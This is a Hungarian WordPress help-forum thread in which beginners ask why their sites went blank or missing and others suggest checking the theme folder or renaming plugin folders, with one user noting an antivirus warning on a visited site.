SOS - Eltűnt a honlap

Sziasztok!





Nagyon-nagyon kezdő vagyok, és tegnap azt hiszem csináltam valami fatális baromságot, ugyenis eltűnt az oldal…





Az egésznek a keretét vki más csinálta meg nekem, én csak a tartalmat töltöttem fel az oldalra… miután mindent feltöltöttem kértem a srácot, hogy véglegesítse a honlapot (azaz tegye át ezt az új verziót, amin dolgoztam a régi helyére), de közölte, hogy most erre neki hetekig nem lesz ideje. Hát kezembe próbáltam venni a dolgokat ilyen eredménnyel:




www.agacska.hu/ujsite


A www.agacska.hu/ujsite/wp-admin - on pedig semmi nem jön be...


Szerintetek ez végzetes és totál eltűnt minden, vagyis kezdhetem előlről, vagy azért van még valami remény?


Köszi!


B.

láthatóan a sablon nincs a helyén.





a “fotosky-10” nevű sablont másold fel a wp-content/themes mappába.

hali. eltünt szó szerint a honlap. fehér képernyő és ennyi.





pedig ma még működött. egy fájlt se módosítottam és nem is töröltem.





mi lehet a probléma?

Mit szólnál,ha mondjuk egy URL-t is írnál? Esetleg,talán véletlenül,ha nem nagy fáradság…meg picit több infót…

www.bozsiracing.hu


sokmindent nem látni rajta.


több infót?





kb. 1 hónapja működik a honlap rendesen. most hirtelen nem jön be, pedig még délután jó volt.


külön theme van betéve. ftp-n ugyanúgy van minden ahogy eddig is.

plugin könyvtárat nevezd át.

vagy az aktuális sablonodét. ha az volt a gond akkor a defaultra fog váltani helyette…

Spec nálam visít a NOD valami Kryptik nevű módosult win32 alkalmazás miatt, amint felmegyek az oldalra…

hiába módosítom a plugins és a themes mappába lévő mappa nevét, ugyanúgy fehér a képernyő.





ma annyit csináltam, hogy feltöltöttem egy 900 megás zip fájlt ftpre (semmi köze nincs a honlaphoz), majd letöröltem. de gondolom nem emiatt van a probléma.


'Balou' wrote on '2009-12-13:




Spec nálam visít a NOD valami Kryptik nevű módosult win32 alkalmazás miatt, amint felmegyek az oldalra...